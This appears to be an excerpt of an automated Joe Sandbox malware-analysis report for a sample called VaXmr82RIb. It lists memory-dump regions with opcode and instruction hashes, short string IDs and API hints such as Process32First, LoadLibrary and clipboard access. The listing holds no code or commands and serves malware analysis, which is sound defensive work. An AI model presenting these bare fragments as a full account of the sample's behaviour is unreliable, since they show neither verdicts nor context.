                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: b6033b17552545f142faa967c330d5e330d7297c719df8c5ce33f14b0e15bd34
                                                      • Instruction ID: 44dee7d78be06dae2c809d6ada2461a6c62f1bcb4dfc1f9a7bdca526b818fd82
                                                      • Opcode Fuzzy Hash: b6033b17552545f142faa967c330d5e330d7297c719df8c5ce33f14b0e15bd34
                                                      • Instruction Fuzzy Hash: D54104B0D052289FEB60CF69C994BDEBBB5BF49305F5480DAD40CA7240DB746A89CF91
                                                      APIs
                                                      • Process32First.KERNEL32(?,?), ref: 080E199E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 6f8a48c1e71de52ced0c55c1c583333a6e8269a7355520346e9a4d13820ad8b1
                                                      • Instruction ID: c3d6290feac6ee3840e951ddf0713b0c88a592db2b40d7024652c69844adf864
                                                      • Opcode Fuzzy Hash: 6f8a48c1e71de52ced0c55c1c583333a6e8269a7355520346e9a4d13820ad8b1
                                                      • Instruction Fuzzy Hash: 964105B0D002289FEB60CF69C994BDEBBB5BF49305F5480DAD40CA7240DB746A89CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 50fd7b533767c10fa58f6380fb979a480f8bad2952a7f0cfed7055f08e2670fa
                                                      • Instruction ID: 39d1096263fbaccce6385de93ef7832805e721fa4dee1803d39dc2cb8469c0d9
                                                      • Opcode Fuzzy Hash: 50fd7b533767c10fa58f6380fb979a480f8bad2952a7f0cfed7055f08e2670fa
                                                      • Instruction Fuzzy Hash: 874135B1D107588FDB20DFA9C885B9EBFF2EB48315F14852AE819AB780D7749841CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: Clipboard
                                                      • String ID:
                                                      • API String ID: 220874293-0
                                                      • Opcode ID: f3e766c4f4be0795ec74184d89196252ccbfc7d23dcbeecf8005e3326874a8b3
                                                      • Instruction ID: e92e9fbfe804396ceb91cca86fb177b7237c016b38720e11ad4097015be7b4f2
                                                      • Opcode Fuzzy Hash: f3e766c4f4be0795ec74184d89196252ccbfc7d23dcbeecf8005e3326874a8b3
                                                      • Instruction Fuzzy Hash: BA3102B0901249DFEB14DF99C985B9EBFF5EF48304F24806AE404BB290DB74A985CF65
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: Clipboard
                                                      • String ID:
                                                      • API String ID: 220874293-0
                                                      • Opcode ID: 7c6acc43ad34283b8de06634a9d5e5b679516710ed38e5ce135f82bd9b50173a
                                                      • Instruction ID: d254a862c2fadc25ac6d38638eb083e346b10fee0cb2219f57a28f377b5bb141
                                                      • Opcode Fuzzy Hash: 7c6acc43ad34283b8de06634a9d5e5b679516710ed38e5ce135f82bd9b50173a
                                                      • Instruction Fuzzy Hash: FE3103B0901208DFEB14DF99C885B9EBFF5EB48304F20806AE404BB390DB746985CFA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;jq
                                                      • API String ID: 0-816949232
                                                      • Opcode ID: ea0d0213b925f6507c33711fd1cb2cbdb538eded874bbb1492e5aeac4c4f316d
                                                      • Instruction ID: fc72065fd9ff98e4bf807878360944c4e853511160fd77efcf2c6fe6d0aaf95b
                                                      • Opcode Fuzzy Hash: ea0d0213b925f6507c33711fd1cb2cbdb538eded874bbb1492e5aeac4c4f316d
                                                      • Instruction Fuzzy Hash: 4E413672F106784BCB18DAADE8845EFB7E69BA8250F19452ADC16FB340DA34CC05CBD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hnq
                                                      • API String ID: 0-2896580000
                                                      • Opcode ID: f16c92c7db02b35acdcc3808025a91761db638ad9515b4e533ef97ecfab5dbf0
                                                      • Instruction ID: f66be98d03d1600541f0e7d507508d4c7f2872aff5460fdac22c60f1f5088657
                                                      • Opcode Fuzzy Hash: f16c92c7db02b35acdcc3808025a91761db638ad9515b4e533ef97ecfab5dbf0
                                                      • Instruction Fuzzy Hash: F6411436B102148FC705DB6DD89456EBBF6BF8921071940AED81AEF391DB309C05CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hnq
                                                      • API String ID: 0-2896580000
                                                      • Opcode ID: 45177b991f2c92bc81e944beabfa4b66fdf9087d6ba5bb63455ef8f2d8b8d6d1
                                                      • Instruction ID: 5d50b67a2b60f9ebe84da99b7a53a86355567eb9d5ff84713dd19fb510449d90
                                                      • Opcode Fuzzy Hash: 45177b991f2c92bc81e944beabfa4b66fdf9087d6ba5bb63455ef8f2d8b8d6d1
                                                      • Instruction Fuzzy Hash: EF41C136F106248F8708EBBDC85446EB7E6BF9921079940AED816EF7A1DB349C01CB84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PHjq
                                                      • API String ID: 0-751881793
                                                      • Opcode ID: 31ffa553fcc8ab0a566f06f550ee45da3b21a400e400f7616b849901911b24a2
                                                      • Instruction ID: b2a9cd87af7ddc878a700f3f5a359ca5159586b570ff4856986ad40ad29c6550
                                                      • Opcode Fuzzy Hash: 31ffa553fcc8ab0a566f06f550ee45da3b21a400e400f7616b849901911b24a2
                                                      • Instruction Fuzzy Hash: 45319075B012048FC758DFA9C584AADBBF2AB88315F1584BDE919FB391EB719C02CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;jq
                                                      • API String ID: 0-3144796544
                                                      • Opcode ID: 62141c3fbeed3342b0038d587cb567610222a15597e6a13d3f2a40ee8f1e685c
                                                      • Instruction ID: 4e71900cce3dd4566dde734502cf21a25d6e2244d5cb50422bf409207ac24128
                                                      • Opcode Fuzzy Hash: 62141c3fbeed3342b0038d587cb567610222a15597e6a13d3f2a40ee8f1e685c
                                                      • Instruction Fuzzy Hash: D63119757045108FC745DF6DC894D6A7BF6BF4AA14B1640AAE905CF372DA31EC01CB94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;jq
                                                      • API String ID: 0-3144796544
                                                      • Opcode ID: f286ddf0e67533c0899f38c874931c10fe4a28745d508229ae5521a8f75e91e9
                                                      • Instruction ID: 93c0944d3a3fe2bf95b5ef5ea502062357974a852fe6d28a7622925fe752ae4f
                                                      • Opcode Fuzzy Hash: f286ddf0e67533c0899f38c874931c10fe4a28745d508229ae5521a8f75e91e9
                                                      • Instruction Fuzzy Hash: 7021E575B105148FC744DF69C898D2AB7EABF89A60B1640A9E905CF371DA31EC01CBA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %Q$G
                                                      • API String ID: 0-3263623426
                                                      • Opcode ID: 3491093aca56bb1553907cc5e65fb8472dd8fac647432c92f02826ea80a912f0
                                                      • Instruction ID: 9cb88ec3f92c185ba4dd6335fbf7d79c102df848b9f206f2d7f3841c0b42d907
                                                      • Opcode Fuzzy Hash: 3491093aca56bb1553907cc5e65fb8472dd8fac647432c92f02826ea80a912f0
                                                      • Instruction Fuzzy Hash: B0113437B11A204B8B94DAAEA8D04ABE2DA5BA816030F40BBDD0ADF390D960CC4583C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq
                                                      • API String ID: 0-2886413773
                                                      • Opcode ID: 3387404355f5979d6139104f4d3933bb25d745c2b51e40085c5985d861f8ca42
                                                      • Instruction ID: f10473422490e4156dd82d8d7f04a6edc82f076d93f3fe9f88ebaef04d18084b
                                                      • Opcode Fuzzy Hash: 3387404355f5979d6139104f4d3933bb25d745c2b51e40085c5985d861f8ca42
                                                      • Instruction Fuzzy Hash: 7B11E532E0CB698FC721DF55CD90566BFB8AF8361071A01ABEC019B252E63D9841CF63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq
                                                      • API String ID: 0-2886413773
                                                      • Opcode ID: bd1c9c050cb638b311ca5ff76d4875b5bf90c954935b278d68701c7fa84a1381
                                                      • Instruction ID: 7aeda7e11eef289be92007fe011fa5065ddbbf159b59995e24ca805361b62304
                                                      • Opcode Fuzzy Hash: bd1c9c050cb638b311ca5ff76d4875b5bf90c954935b278d68701c7fa84a1381
                                                      • Instruction Fuzzy Hash: E8110672B0C7A49FCBA3CB2488615AA7F75AF8B21031A05EBD444CB352D7324805CF52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq
                                                      • API String ID: 0-2886413773
                                                      • Opcode ID: edbc36683e204dd47425e11d95245a6eace0a9217ad6f706997dae4aab202bbf
                                                      • Instruction ID: 71ee447a60671f6095809efd1ec28a70d64a76306faeef684763841c175049d0
                                                      • Opcode Fuzzy Hash: edbc36683e204dd47425e11d95245a6eace0a9217ad6f706997dae4aab202bbf
                                                      • Instruction Fuzzy Hash: 98F09631A0E7E65FC72787284820422BF755F93111B1F81EBC488DF293D5258C46CB76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'jq
                                                      • API String ID: 0-3676250632
                                                      • Opcode ID: 9d2c7b88cb581d04354584822dc9d440a2d233d94930ea0d854c3f3feec4d929
                                                      • Instruction ID: 9c5d1d256be48d45affa66ef5faab90377e5cb396f663cf33ee072e2cc3bea97
                                                      • Opcode Fuzzy Hash: 9d2c7b88cb581d04354584822dc9d440a2d233d94930ea0d854c3f3feec4d929
                                                      • Instruction Fuzzy Hash: 0DE09A31B1A7858FC7468A589A20020BFB2AF9701030E40FBD045CFAA3E6289C09CB26
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq
                                                      • API String ID: 0-2886413773
                                                      • Opcode ID: d1b2b02bb42bea1b4c297b04ee68a3fb4642e5fa7334212adeebb848866aaced
                                                      • Instruction ID: 86b0245cc38860298cd728bf01fc30fa675cea26001a7641364afa147196648a
                                                      • Opcode Fuzzy Hash: d1b2b02bb42bea1b4c297b04ee68a3fb4642e5fa7334212adeebb848866aaced
                                                      • Instruction Fuzzy Hash: F2E0C231F0DE36C78B39871DA204029AE636BD356272EC27A8C009A314C9318C82CF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq
                                                      • API String ID: 0-2886413773
                                                      • Opcode ID: abc8fa47e1ce340bfe85dc3772db43120175e512d2d6cbbe2b7518980fb369ad
                                                      • Instruction ID: 0de4ed1db1cc468b822364d66c6bafe24bc46ed5ca5918b59ab25efcdb67fe29
                                                      • Opcode Fuzzy Hash: abc8fa47e1ce340bfe85dc3772db43120175e512d2d6cbbe2b7518980fb369ad
                                                      • Instruction Fuzzy Hash: DFD02325753536874838970C302047D66D357C156032E046AC441CF344CDB0DC4387C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c0a26abd88b60651ebf366ab9f413fcf47491cd303df31a8938c70ba7705015
                                                      • Instruction ID: 4913965e84dd340cf5ce71ee1fb15546f923b8f2df94ece19a7fe9f0605cce5d
                                                      • Opcode Fuzzy Hash: 4c0a26abd88b60651ebf366ab9f413fcf47491cd303df31a8938c70ba7705015
                                                      • Instruction Fuzzy Hash: 3731A871B002198FCB18EFACC89457EBBE6AB84311705846DEA55DB362EA75DC42CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f60d5e8867ff69f44ed1abde6e855369f19d8fc0ab4e1f6b834788fe0dce38ee
                                                      • Instruction ID: 87769f69ab28b1c4d9aafc817f2146c511f64fe3f8a24ed0439e1cd3fc02ee42
                                                      • Opcode Fuzzy Hash: f60d5e8867ff69f44ed1abde6e855369f19d8fc0ab4e1f6b834788fe0dce38ee
                                                      • Instruction Fuzzy Hash: 1261AF75A006058FCB18DF69D4849AEBBF2EF88310B15856EE41AEF351DB71AC42CB84
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53162b221b52efb048bf211c21c45b95edade81148bd35da2df1f6a462d2ae1c
                                                      • Instruction ID: 7e20833e89d43f43aba3877a62616b3eb4a24d5a0e10a3f6f3d2fbe036094d12
                                                      • Opcode Fuzzy Hash: 53162b221b52efb048bf211c21c45b95edade81148bd35da2df1f6a462d2ae1c
                                                      • Instruction Fuzzy Hash: C851B375E001298FC718DF68C9809AAF7B6AF88314B19856ED819EB341DB31EC46CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56f731cdcf8a6f4ec4ac590b285cbadf85537f07d3703710e5888b83030e61cd
                                                      • Instruction ID: b3402b7ccc28eb5b3f504d898b3bd22fc9f7cc7e3ee865dfab75e2c6582b5a38
                                                      • Opcode Fuzzy Hash: 56f731cdcf8a6f4ec4ac590b285cbadf85537f07d3703710e5888b83030e61cd
                                                      • Instruction Fuzzy Hash: D5412B72E101299FCB15DB68D4908DDFBB2AB84310B1A816EDC15F7391DA71AD06CBD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c7cb30aa3418707bd0d7fe39fbd3f3ee0e30057959f7623b7f53f98a2e0b4e67
                                                      • Instruction ID: 3d59600a9b680de620016d755c6e7d59077580367b8a3605e29eaa515de955aa
                                                      • Opcode Fuzzy Hash: c7cb30aa3418707bd0d7fe39fbd3f3ee0e30057959f7623b7f53f98a2e0b4e67
                                                      • Instruction Fuzzy Hash: 66412775A01605CFCB18DF68D4849AEBBF2FF88310B15856AE816AB751DB71EC42CF40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 569a0fe8aea1402131b9e70297b401b6ab1ddb8c58c037f905e86b2d371b8884
                                                      • Instruction ID: b4b72e72448b5323680a34006d23ae390b2f765ecfd0bf4ada9865c78b229aca
                                                      • Opcode Fuzzy Hash: 569a0fe8aea1402131b9e70297b401b6ab1ddb8c58c037f905e86b2d371b8884
                                                      • Instruction Fuzzy Hash: A8410675A01609CFCB18DF68D49499EBBF6FF88310F15856AE816AB361DB71EC42CB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5aae2885e22267160fb13db79dc1dddc8c05a78186cd75b73250c7eb6574a219
                                                      • Instruction ID: 3358806681e11a48a5c02b36e2834027e20907f3ed197c4d35a54db1b914b896
                                                      • Opcode Fuzzy Hash: 5aae2885e22267160fb13db79dc1dddc8c05a78186cd75b73250c7eb6574a219
                                                      • Instruction Fuzzy Hash: 4231FB77F205244F8708CB6DD89445DB7E6FFD922131E40BEE909EF361DA649D098780
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20b5c6ff8949dbefe17f29cbc54e858c3ad98e71342f16a1b13bb6c356012622
                                                      • Instruction ID: 2e26a36472968bf947ee715d39b1b69cfe9a0078fe30ecd4cc139d80a9565496
                                                      • Opcode Fuzzy Hash: 20b5c6ff8949dbefe17f29cbc54e858c3ad98e71342f16a1b13bb6c356012622
                                                      • Instruction Fuzzy Hash: 0B414736E002698BCF14EF68C88099AB7B6BF84301B05855EEC06EB344D772DC15DBD2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ebae8684d0675cdd65a089f1980b5824f97ebc7ea06ee11525f660f5ed8c401e
                                                      • Instruction ID: cc70624a0f027cac7fd035212374f380dd455a5eca3ed691d8a5b1427e1d36c6
                                                      • Opcode Fuzzy Hash: ebae8684d0675cdd65a089f1980b5824f97ebc7ea06ee11525f660f5ed8c401e
                                                      • Instruction Fuzzy Hash: A1411770A01605CFDB08DF68C494A9DBBF2EF98314F19856AE419AF361DB71E982CF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fc2c591779ba7bc8678a499de57b21d3732ebff3d2ee640923fd0531804a390
                                                      • Instruction ID: 1b3b4c633a4729bd54f0a596bf8e982b35c926ba4860eb27ccdfb04956d94bdc
                                                      • Opcode Fuzzy Hash: 6fc2c591779ba7bc8678a499de57b21d3732ebff3d2ee640923fd0531804a390
                                                      • Instruction Fuzzy Hash: A43149B0D04249AFCB11DFE9C580AEEBFF5AF48300F24845EE919AB251CB759945CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fd06f864dbd97c62d86184fa9d59c99dfa2314d823b90af01c7a5b8ce75e891
                                                      • Instruction ID: 9a598bf01fdb68a105122ab8df911973c8eabaf83c605e58492b7b44fd7f5826
                                                      • Opcode Fuzzy Hash: 8fd06f864dbd97c62d86184fa9d59c99dfa2314d823b90af01c7a5b8ce75e891
                                                      • Instruction Fuzzy Hash: 4D312731A002188FC718DF69D8C0959B7F6EF88318B59827ED909EB311CB31AC46CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac679ec4e98f1c417391232cb0de43c1f3dfdeeac6c5a3361597e76222c38aba
                                                      • Instruction ID: b0a7f27fd445a6f662d91751450fee7b33074d000584753115de9be915ceef94
                                                      • Opcode Fuzzy Hash: ac679ec4e98f1c417391232cb0de43c1f3dfdeeac6c5a3361597e76222c38aba
                                                      • Instruction Fuzzy Hash: 8B31E577E111358BCB04DF58D5904DDBBB2AB98310B1A816EDC09FB381D631AD06CBD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 959a2cff6101dda09de03d3d4965187e4f08a2d8e55f4606ec502b801945280e
                                                      • Instruction ID: 44a41bf41ff32aefba95f2b2b763409d0c6e866eca30b6b95f708815fa703e2a
                                                      • Opcode Fuzzy Hash: 959a2cff6101dda09de03d3d4965187e4f08a2d8e55f4606ec502b801945280e
                                                      • Instruction Fuzzy Hash: 7F31F436E006258F8B18DF6DC84449AB7B7BFD8210745817ED408EBB50DB329C61CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ba43236978b76de1a17a6f16cb0ae023cf09be0d353a6728e16c1cd74afecdf
                                                      • Instruction ID: 1d1b8b72999e15c1a75842e27da2ca6bb8096798c49ff4d5073d3a3e818e5661
                                                      • Opcode Fuzzy Hash: 0ba43236978b76de1a17a6f16cb0ae023cf09be0d353a6728e16c1cd74afecdf
                                                      • Instruction Fuzzy Hash: E831C274A052449FC715EF64C89096AFBB6FF89314F14C4AED9698B352D732EC02CB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b341f36d5df602cf98062f1e145004ceacdabcbe39df717ebaed855f43920c1a
                                                      • Instruction ID: c488a686772a279de7676f50dff204da7284e7385b6ed5589eed1a3137dc811e
                                                      • Opcode Fuzzy Hash: b341f36d5df602cf98062f1e145004ceacdabcbe39df717ebaed855f43920c1a
                                                      • Instruction Fuzzy Hash: EB3139B0D00249AFCB10DFE9C580ADEBFF5AF48310F248419E919AB350DB359A45CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad3c38a1aa57e87638806943703a299eac5dcefaf021c907df4aac56197ccded
                                                      • Instruction ID: b4b19ad9ab88e6a5f40272adbecf57ab12823670da40390c63482b4ce46f8362
                                                      • Opcode Fuzzy Hash: ad3c38a1aa57e87638806943703a299eac5dcefaf021c907df4aac56197ccded
                                                      • Instruction Fuzzy Hash: 4921CE36E006299F8B18DE6EC84449AF7B7BFD8210755816ED818EB750DB729C61CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4395292f9360ff05d78365bc93c8e205221ee0bb106d4d8ab0fbff5994ef7a77
                                                      • Instruction ID: 19c97535c17dc8fca57e0be4418edb62b55a06ccf69c08cbba43cae1f48d18fe
                                                      • Opcode Fuzzy Hash: 4395292f9360ff05d78365bc93c8e205221ee0bb106d4d8ab0fbff5994ef7a77
